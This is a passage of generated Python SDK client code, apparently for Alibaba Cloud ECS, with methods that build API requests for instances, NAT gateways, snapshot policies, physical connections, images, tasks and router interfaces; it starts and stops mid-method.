self._handle_request(api_request).result def describe_instance_auto_renew_attribute( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, renewal_status=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeInstanceAutoRenewAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "RenewalStatus": renewal_status, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def describe_snapshot_links( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, page_size=None, disk_ids=None, snapshot_link_ids=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeSnapshotLinks', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "PageSize": page_size, "DiskIds": disk_ids, "SnapshotLinkIds": snapshot_link_ids, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def modify_instance_auto_release_time( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, 
owner_account=None, auto_release_time=None, owner_id=None): api_request = APIRequest('ModifyInstanceAutoReleaseTime', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "AutoReleaseTime": auto_release_time, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_new_project_eip_monitor_data( self, resource_owner_id=None, period=None, resource_owner_account=None, region_id=None, owner_account=None, end_time=None, allocation_id=None, start_time=None, owner_id=None): api_request = APIRequest('DescribeNewProjectEipMonitorData', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Period": period, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "EndTime": end_time, "AllocationId": allocation_id, "StartTime": start_time, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_user_data( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_id=None): api_request = APIRequest('DescribeUserData', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerId": owner_id} return self._handle_request(api_request).result def remove_bandwidth_package_ips( self, list_of_removed_ip_addresses=None, resource_owner_id=None, bandwidth_package_id=None, resource_owner_account=None, region_id=None, client_token=None, owner_account=None, owner_id=None): api_request = APIRequest('RemoveBandwidthPackageIps', 'GET', 'http', 'RPC', 'query') api_request._params = { "RemovedIpAddresses": list_of_removed_ip_addresses, "ResourceOwnerId": resource_owner_id, "BandwidthPackageId": bandwidth_package_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ClientToken": client_token, "OwnerAccount": owner_account, "OwnerId": owner_id} repeat_info = {"RemovedIpAddresses": ('RemovedIpAddresses', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def modify_forward_entry( self, resource_owner_id=None, resource_owner_account=None, ip_protocol=None, owner_account=None, forward_table_id=None, owner_id=None, internal_ip=None, region_id=None, forward_entry_id=None, internal_port=None, external_ip=None, external_port=None): api_request = APIRequest('ModifyForwardEntry', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "IpProtocol": ip_protocol, "OwnerAccount": owner_account, "ForwardTableId": forward_table_id, "OwnerId": owner_id, "InternalIp": internal_ip, "RegionId": region_id, "ForwardEntryId": forward_entry_id, "InternalPort": internal_port, "ExternalIp": external_ip, "ExternalPort": external_port} return self._handle_request(api_request).result def modify_bandwidth_package_spec( self, resource_owner_id=None, bandwidth_package_id=None, resource_owner_account=None, region_id=None, bandwidth=None, owner_account=None, owner_id=None): api_request = APIRequest('ModifyBandwidthPackageSpec', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "BandwidthPackageId": bandwidth_package_id, "ResourceOwnerAccount": 
resource_owner_account, "RegionId": region_id, "Bandwidth": bandwidth, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_nat_gateways( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, vpc_id=None, page_size=None, nat_gateway_id=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeNatGateways', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "VpcId": vpc_id, "PageSize": page_size, "NatGatewayId": nat_gateway_id, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def describe_forward_table_entries( self, resource_owner_id=None, resource_owner_account=None, region_id=None, forward_entry_id=None, owner_account=None, forward_table_id=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeForwardTableEntries', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ForwardEntryId": forward_entry_id, "OwnerAccount": owner_account, "ForwardTableId": forward_table_id, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def describe_bandwidth_packages( self, resource_owner_id=None, bandwidth_package_id=None, resource_owner_account=None, region_id=None, owner_account=None, page_size=None, nat_gateway_id=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeBandwidthPackages', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "BandwidthPackageId": bandwidth_package_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "PageSize": page_size, "NatGatewayId": nat_gateway_id, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def delete_nat_gateway( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, nat_gateway_id=None, owner_id=None): api_request = APIRequest('DeleteNatGateway', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "NatGatewayId": nat_gateway_id, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_forward_entry( self, resource_owner_id=None, resource_owner_account=None, region_id=None, forward_entry_id=None, owner_account=None, forward_table_id=None, owner_id=None): api_request = APIRequest('DeleteForwardEntry', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ForwardEntryId": forward_entry_id, "OwnerAccount": owner_account, "ForwardTableId": forward_table_id, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_bandwidth_package( self, resource_owner_id=None, bandwidth_package_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteBandwidthPackage', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "BandwidthPackageId": bandwidth_package_id, 
"ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def create_nat_gateway( self, resource_owner_id=None, resource_owner_account=None, region_id=None, client_token=None, owner_account=None, vpc_id=None, name=None, description=None, owner_id=None, list_of_bandwidth_package=None): api_request = APIRequest('CreateNatGateway', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ClientToken": client_token, "OwnerAccount": owner_account, "VpcId": vpc_id, "Name": name, "Description": description, "OwnerId": owner_id, "BandwidthPackage": list_of_bandwidth_package} repeat_info = { "BandwidthPackage": ( 'BandwidthPackage', 'list', 'dict', [ ('Bandwidth', 'str', None, None), ('Zone', 'str', None, None), ('IpCount', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def create_forward_entry( self, resource_owner_id=None, resource_owner_account=None, region_id=None, ip_protocol=None, internal_port=None, owner_account=None, forward_table_id=None, owner_id=None, external_ip=None, external_port=None, internal_ip=None): api_request = APIRequest('CreateForwardEntry', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "IpProtocol": ip_protocol, "InternalPort": internal_port, "OwnerAccount": owner_account, "ForwardTableId": forward_table_id, "OwnerId": owner_id, "ExternalIp": external_ip, "ExternalPort": external_port, "InternalIp": internal_ip} return self._handle_request(api_request).result def add_bandwidth_package_ips( self, resource_owner_id=None, bandwidth_package_id=None, resource_owner_account=None, region_id=None, client_token=None, owner_account=None, owner_id=None, ip_count=None): api_request = APIRequest('AddBandwidthPackageIps', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "BandwidthPackageId": bandwidth_package_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ClientToken": client_token, "OwnerAccount": owner_account, "OwnerId": owner_id, "IpCount": ip_count} return self._handle_request(api_request).result def eip_fill_product( self, resource_owner_id=None, data=None, resource_owner_account=None, client_token=None, owner_account=None, user_cidr=None, owner_id=None): api_request = APIRequest('EipFillProduct', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "data": data, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "UserCidr": user_cidr, "OwnerId": owner_id} return self._handle_request(api_request).result def eip_notify_paid( self, resource_owner_id=None, data=None, resource_owner_account=None, client_token=None, owner_account=None, user_cidr=None, owner_id=None): api_request = APIRequest('EipNotifyPaid', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "data": data, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "UserCidr": user_cidr, "OwnerId": owner_id} return self._handle_request(api_request).result def eip_fill_params( self, resource_owner_id=None, data=None, resource_owner_account=None, 
client_token=None, owner_account=None, user_cidr=None, owner_id=None): api_request = APIRequest('EipFillParams', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "data": data, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "UserCidr": user_cidr, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_auto_snapshot_policy_ex( self, resource_owner_id=None, resource_owner_account=None, region_id=None, auto_snapshot_policy_id=None, time_points=None, retention_days=None, owner_id=None, repeat_weekdays=None, auto_snapshot_policy_name=None): api_request = APIRequest('ModifyAutoSnapshotPolicyEx', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "regionId": region_id, "autoSnapshotPolicyId": auto_snapshot_policy_id, "timePoints": time_points, "retentionDays": retention_days, "OwnerId": owner_id, "repeatWeekdays": repeat_weekdays, "autoSnapshotPolicyName": auto_snapshot_policy_name} return self._handle_request(api_request).result def describe_auto_snapshot_policy_ex( self, resource_owner_id=None, resource_owner_account=None, region_id=None, auto_snapshot_policy_id=None, owner_account=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeAutoSnapshotPolicyEx', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "AutoSnapshotPolicyId": auto_snapshot_policy_id, "OwnerAccount": owner_account, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def delete_auto_snapshot_policy( self, resource_owner_id=None, resource_owner_account=None, region_id=None, auto_snapshot_policy_id=None, owner_id=None): api_request = APIRequest('DeleteAutoSnapshotPolicy', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "regionId": region_id, "autoSnapshotPolicyId": auto_snapshot_policy_id, "OwnerId": owner_id} return self._handle_request(api_request).result def create_auto_snapshot_policy( self, resource_owner_id=None, resource_owner_account=None, region_id=None, time_points=None, retention_days=None, owner_id=None, repeat_weekdays=None, auto_snapshot_policy_name=None): api_request = APIRequest('CreateAutoSnapshotPolicy', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "regionId": region_id, "timePoints": time_points, "retentionDays": retention_days, "OwnerId": owner_id, "repeatWeekdays": repeat_weekdays, "autoSnapshotPolicyName": auto_snapshot_policy_name} return self._handle_request(api_request).result def cancel_auto_snapshot_policy( self, resource_owner_id=None, resource_owner_account=None, region_id=None, disk_ids=None, owner_id=None): api_request = APIRequest('CancelAutoSnapshotPolicy', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "regionId": region_id, "diskIds": disk_ids, "OwnerId": owner_id} return self._handle_request(api_request).result def apply_auto_snapshot_policy( self, resource_owner_id=None, resource_owner_account=None, region_id=None, auto_snapshot_policy_id=None, disk_ids=None, owner_id=None): api_request 
= APIRequest('ApplyAutoSnapshotPolicy', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "regionId": region_id, "autoSnapshotPolicyId": auto_snapshot_policy_id, "diskIds": disk_ids, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_image_support_instance_types( self, action_type=None, list_of_filter_=None, resource_owner_id=None, image_id=None, resource_owner_account=None, region_id=None, owner_id=None): api_request = APIRequest('DescribeImageSupportInstanceTypes', 'GET', 'http', 'RPC', 'query') api_request._params = { "ActionType": action_type, "Filter": list_of_filter_, "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerId": owner_id} repeat_info = {"Filter": ('Filter', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def terminate_virtual_border_router( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, owner_account=None, user_cidr=None, vbr_id=None, owner_id=None): api_request = APIRequest('TerminateVirtualBorderRouter', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "UserCidr": user_cidr, "VbrId": vbr_id, "OwnerId": owner_id} return self._handle_request(api_request).result def terminate_physical_connection( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, physical_connection_id=None, owner_account=None, user_cidr=None, owner_id=None): api_request = APIRequest('TerminatePhysicalConnection', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "PhysicalConnectionId": physical_connection_id, "OwnerAccount": owner_account, "UserCidr": user_cidr, "OwnerId": owner_id} return self._handle_request(api_request).result def recover_virtual_border_router( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, owner_account=None, user_cidr=None, vbr_id=None, owner_id=None): api_request = APIRequest('RecoverVirtualBorderRouter', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "UserCidr": user_cidr, "VbrId": vbr_id, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_virtual_border_router_attribute( self, resource_owner_id=None, circuit_code=None, vlan_id=None, resource_owner_account=None, client_token=None, owner_account=None, description=None, vbr_id=None, owner_id=None, peer_gateway_ip=None, peering_subnet_mask=None, region_id=None, name=None, local_gateway_ip=None, user_cidr=None): api_request = APIRequest('ModifyVirtualBorderRouterAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "CircuitCode": circuit_code, "VlanId": vlan_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "Description": description, "VbrId": 
vbr_id, "OwnerId": owner_id, "PeerGatewayIp": peer_gateway_ip, "PeeringSubnetMask": peering_subnet_mask, "RegionId": region_id, "Name": name, "LocalGatewayIp": local_gateway_ip, "UserCidr": user_cidr} return self._handle_request(api_request).result def modify_physical_connection_attribute( self, redundant_physical_connection_id=None, peer_location=None, resource_owner_id=None, port_type=None, circuit_code=None, bandwidth=None, client_token=None, resource_owner_account=None, owner_account=None, description=None, owner_id=None, line_operator=None, region_id=None, physical_connection_id=None, name=None, user_cidr=None): api_request = APIRequest('ModifyPhysicalConnectionAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "RedundantPhysicalConnectionId": redundant_physical_connection_id, "PeerLocation": peer_location, "ResourceOwnerId": resource_owner_id, "PortType": port_type, "CircuitCode": circuit_code, "bandwidth": bandwidth, "ClientToken": client_token, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id, "LineOperator": line_operator, "RegionId": region_id, "PhysicalConnectionId": physical_connection_id, "Name": name, "UserCidr": user_cidr} return self._handle_request(api_request).result def enable_physical_connection( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, physical_connection_id=None, owner_account=None, user_cidr=None, owner_id=None): api_request = APIRequest('EnablePhysicalConnection', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "PhysicalConnectionId": physical_connection_id, "OwnerAccount": owner_account, "UserCidr": user_cidr, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_virtual_border_routers_for_physical_connection( self, list_of_filter_=None, resource_owner_id=None, resource_owner_account=None, region_id=None, physical_connection_id=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest( 'DescribeVirtualBorderRoutersForPhysicalConnection', 'GET', 'http', 'RPC', 'query') api_request._params = { "Filter": list_of_filter_, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "PhysicalConnectionId": physical_connection_id, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} repeat_info = {"Filter": ('Filter', 'list', 'dict', [('Value', 'list', 'str', None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_virtual_border_routers( self, list_of_filter_=None, resource_owner_id=None, resource_owner_account=None, region_id=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeVirtualBorderRouters', 'GET', 'http', 'RPC', 'query') api_request._params = { "Filter": list_of_filter_, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} repeat_info = {"Filter": ('Filter', 'list', 'dict', [('Value', 'list', 'str', None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_physical_connections( self, list_of_filter_=None, 
resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, owner_account=None, page_size=None, user_cidr=None, owner_id=None, page_number=None): api_request = APIRequest('DescribePhysicalConnections', 'GET', 'http', 'RPC', 'query') api_request._params = { "Filter": list_of_filter_, "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "PageSize": page_size, "UserCidr": user_cidr, "OwnerId": owner_id, "PageNumber": page_number} repeat_info = {"Filter": ('Filter', 'list', 'dict', [('Value', 'list', 'str', None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_access_points( self, list_of_filter_=None, resource_owner_id=None, resource_owner_account=None, region_id=None, page_size=None, owner_id=None, type_=None, page_number=None): api_request = APIRequest('DescribeAccessPoints', 'GET', 'http', 'RPC', 'query') api_request._params = { "Filter": list_of_filter_, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "PageSize": page_size, "OwnerId": owner_id, "Type": type_, "PageNumber": page_number} repeat_info = {"Filter": ('Filter', 'list', 'dict', [('Value', 'list', 'str', None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_virtual_border_router( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, owner_account=None, user_cidr=None, vbr_id=None, owner_id=None): api_request = APIRequest('DeleteVirtualBorderRouter', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "UserCidr": user_cidr, "VbrId": vbr_id, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_physical_connection( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, physical_connection_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DeletePhysicalConnection', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "PhysicalConnectionId": physical_connection_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def create_virtual_border_router( self, resource_owner_id=None, circuit_code=None, vlan_id=None, client_token=None, resource_owner_account=None, owner_account=None, description=None, owner_id=None, peer_gateway_ip=None, peering_subnet_mask=None, region_id=None, physical_connection_id=None, name=None, local_gateway_ip=None, user_cidr=None, vbr_owner_id=None): api_request = APIRequest('CreateVirtualBorderRouter', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "CircuitCode": circuit_code, "VlanId": vlan_id, "ClientToken": client_token, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id, "PeerGatewayIp": peer_gateway_ip, "PeeringSubnetMask": peering_subnet_mask, "RegionId": region_id, "PhysicalConnectionId": physical_connection_id, "Name": 
name, "LocalGatewayIp": local_gateway_ip, "UserCidr": user_cidr, "VbrOwnerId": vbr_owner_id} return self._handle_request(api_request).result def create_physical_connection( self, access_point_id=None, redundant_physical_connection_id=None, peer_location=None, resource_owner_id=None, port_type=None, circuit_code=None, bandwidth=None, client_token=None, resource_owner_account=None, owner_account=None, description=None, type_=None, owner_id=None, line_operator=None, region_id=None, name=None, user_cidr=None): api_request = APIRequest('CreatePhysicalConnection', 'GET', 'http', 'RPC', 'query') api_request._params = { "AccessPointId": access_point_id, "RedundantPhysicalConnectionId": redundant_physical_connection_id, "PeerLocation": peer_location, "ResourceOwnerId": resource_owner_id, "PortType": port_type, "CircuitCode": circuit_code, "bandwidth": bandwidth, "ClientToken": client_token, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Description": description, "Type": type_, "OwnerId": owner_id, "LineOperator": line_operator, "RegionId": region_id, "Name": name, "UserCidr": user_cidr} return self._handle_request(api_request).result def cancel_physical_connection( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, physical_connection_id=None, owner_account=None, user_cidr=None, owner_id=None): api_request = APIRequest('CancelPhysicalConnection', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "PhysicalConnectionId": physical_connection_id, "OwnerAccount": owner_account, "UserCidr": user_cidr, "OwnerId": owner_id} return self._handle_request(api_request).result def import_image( self, list_of_disk_device_mapping=None, resource_owner_id=None, license_type=None, resource_owner_account=None, role_name=None, description=None, os_type=None, owner_id=None, platform=None, region_id=None, image_name=None, architecture=None): api_request = APIRequest('ImportImage', 'GET', 'http', 'RPC', 'query') api_request._params = { "DiskDeviceMapping": list_of_disk_device_mapping, "ResourceOwnerId": resource_owner_id, "LicenseType": license_type, "ResourceOwnerAccount": resource_owner_account, "RoleName": role_name, "Description": description, "OSType": os_type, "OwnerId": owner_id, "Platform": platform, "RegionId": region_id, "ImageName": image_name, "Architecture": architecture} repeat_info = {"DiskDeviceMapping": ('DiskDeviceMapping', 'list', 'dict', [('OSSBucket', 'str', None, None), ('DiskImSize', 'str', None, None), ('Format', 'str', None, None), ('Device', 'str', None, None), ('OSSObject', 'str', None, None), ('DiskImageSize', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def export_image( self, resource_owner_id=None, image_id=None, oss_bucket=None, resource_owner_account=None, region_id=None, oss_prefix=None, role_name=None, owner_id=None, image_format=None): api_request = APIRequest('ExportImage', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "OSSBucket": oss_bucket, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OSSPrefix": oss_prefix, "RoleName": role_name, "OwnerId": owner_id, "ImageFormat": image_format} return self._handle_request(api_request).result def describe_tasks( self, resource_owner_id=None, 
resource_owner_account=None, owner_account=None, end_time=None, start_time=None, owner_id=None, task_ids=None, page_number=None, task_status=None, region_id=None, page_size=None, task_action=None): api_request = APIRequest('DescribeTasks', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "EndTime": end_time, "StartTime": start_time, "OwnerId": owner_id, "TaskIds": task_ids, "PageNumber": page_number, "TaskStatus": task_status, "RegionId": region_id, "PageSize": page_size, "TaskAction": task_action} return self._handle_request(api_request).result def describe_task_attribute( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_id=None, task_id=None): api_request = APIRequest('DescribeTaskAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerId": owner_id, "TaskId": task_id} return self._handle_request(api_request).result def cancel_task( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_id=None, task_id=None): api_request = APIRequest('CancelTask', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerId": owner_id, "TaskId": task_id} return self._handle_request(api_request).result def describe_instance_type_families( self, generation=None, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeInstanceTypeFamilies', 'GET', 'http', 'RPC', 'query') api_request._params = { "Generation": generation, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_router_interface_spec( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, owner_account=None, user_cidr=None, router_interface_id=None, owner_id=None, spec=None): api_request = APIRequest('ModifyRouterInterfaceSpec', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "UserCidr": user_cidr, "RouterInterfaceId": router_interface_id, "OwnerId": owner_id, "Spec": spec} return self._handle_request(api_request).result def modify_router_interface_attribute( self, opposite_router_id=None, resource_owner_id=None, resource_owner_account=None, description=None, health_check_target_ip=None, owner_id=None, router_interface_id=None, opposite_interface_owner_id=None, region_id=None, health_check_source_ip=None, name=None, opposite_router_type=None, opposite_interface_id=None): api_request = APIRequest('ModifyRouterInterfaceAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "OppositeRouterId": opposite_router_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "Description": description, "HealthCheckTargetIp": health_check_target_ip, "OwnerId": owner_id, "RouterInterfaceId": router_interface_id, "OppositeInterfaceOwnerId": opposite_interface_owner_id, "RegionId": region_id, "HealthCheckSourceIp": health_check_source_ip, "Name": name, 
"OppositeRouterType": opposite_router_type, "OppositeInterfaceId": opposite_interface_id} return self._handle_request(api_request).result def describe_router_interfaces( self, list_of_filter_=None, resource_owner_id=None, resource_owner_account=None, region_id=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeRouterInterfaces', 'GET', 'http', 'RPC', 'query') api_request._params = { "Filter": list_of_filter_, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} repeat_info = {"Filter": ('Filter', 'list', 'dict', [('Value', 'list', 'str', None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_router_interface( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, owner_account=None, user_cidr=None, router_interface_id=None, owner_id=None): api_request = APIRequest('DeleteRouterInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "UserCidr": user_cidr, "RouterInterfaceId": router_interface_id, "OwnerId": owner_id} return self._handle_request(api_request).result def deactivate_router_interface( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_id=None, router_interface_id=None): api_request = APIRequest('DeactivateRouterInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": 